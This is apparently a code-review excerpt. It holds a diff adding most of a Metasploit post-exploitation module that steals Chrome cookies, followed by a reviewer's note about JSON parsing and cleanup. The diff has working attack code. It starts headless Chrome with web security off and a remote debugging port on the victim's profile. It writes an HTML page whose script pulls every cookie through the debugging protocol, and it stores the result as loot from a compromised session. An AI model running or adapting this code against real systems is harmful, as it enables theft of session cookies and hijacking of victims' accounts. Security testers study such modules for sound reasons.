modules/post/multi/gather/chrome_cookies.rb

```diff
@@ -0,0 +1,147 @@
+
+    @retries = datastore['MAX_RETRIES']
+    @temp_storage_dir = datastore['TEMP_STORAGE_DIR']
+
+    unless writable? @temp_storage_dir
+      fail_with Failure::BadConfig, "#{@temp_storage_dir} is not writable"
+    end
+
+    @html_storage_path = create_cookie_stealing_html
+
+    @chrome_debugging_cmd = "#{@chrome} --headless --disable-web-security --disable-plugins --user-data-dir=\"#{@user_data_dir}\" --remote-debugging-port=#{datastore['REMOTE_DEBUGGING_PORT']} #{@html_storage_path}"
+
+    nil
+  end
+
+  def create_cookie_stealing_html
+    cookie_stealing_html = %(
+      <!DOCTYPE html>
+      <html lang="en">
+      <head>
+        <meta charset="utf-8">
+        <title>index.html</title>
+      </head>
+      <body>
+          <script>
+
+              var remoteDebuggingPort = #{datastore['REMOTE_DEBUGGING_PORT']};
+              var request = new XMLHttpRequest();
+              request.open("GET", "http://localhost:" + remoteDebuggingPort + "/json");
+              request.responseType = 'json';
+              request.send();
+
+              request.onload = function() {
+                var webSocketDebuggerUrl = request.response[0].webSocketDebuggerUrl;
+                console.log(webSocketDebuggerUrl);
+                var connection = new WebSocket(webSocketDebuggerUrl);
+
+                connection.onopen = function () {
+                  connection.send('{"id": 1, "method": "Network.getAllCookies"}');
+                };
+
+                connection.onmessage = function (e) {
+                  var cookies_blob = JSON.stringify(JSON.parse(e.data).result.cookies);
+                  console.log('REMOTE_DEBUGGING|' + cookies_blob);
+                };
+              }
+          </script>
+      </body>
+      </html>
+    )
+
+    # Where to temporarily store the cookie-stealing html
+    html_storage_path = File.join @temp_storage_dir, Rex::Text.rand_text_alphanumeric(10..15)
+    write_file html_storage_path, cookie_stealing_html
+    html_storage_path
+  end
+
+  def cleanup_html
+    rm_f @html_storage_path
+  end
+
+  def get_cookies
+    chrome_output = cmd_exec @chrome_debugging_cmd
+
+    print_status "Activated Chrome's Remote Debugging via #{@chrome_debugging_cmd}"
+
+    # Parse out the cookies from Chrome's output
+    cookies_pattern = /REMOTE_DEBUGGING|\[.*\]/m
+    cookies_msg = cookies_pattern.match(chrome_output).to_s
+
+    # Slice off the "REMOTE_DEBUGGING|" delimiter, and join the cookies back together (cookies may contain "|").
+    cookies_json = cookies_msg.split("|")[1..-1].join("|")
+
+    cookies_json
+  end
+
+  def save(msg, data, ctype = 'text/json')
+    ltype = 'chrome.gather.cookies'
+    loot = store_loot ltype, ctype, session, data, nil, msg
+    print_good "#{msg} stored in #{loot}"
+  end
+
+  def run
+    fail_with Failure::BadConfig, 'No session found, giving up' if session.nil?
+
+    configure_for_platform
+    cookies = get_cookies
+    cookies_parsed = JSON.parse cookies
```

Comment:
Given that you're doing manual parsing to return the `cookies`, it is possible that `cookies` will not be valid JSON, in which case you're in for a bad time.

Consider adding an `ensure` to the `exploit` method, to ensure graceful cleanup; and also consider adding a `begin` / `rescue` clause to the JSON parsing here. Given that the `exploit` method is fairly short, you could do something like this:

```ruby
def exploit
  configure_some_stuff
  parse_some_json
  save_the_result
rescue JSON::ParserError => e
  print_error "Something when horribly wrong parsing the JSON: #{e.message}"
ensure
  cleanup_html
end
```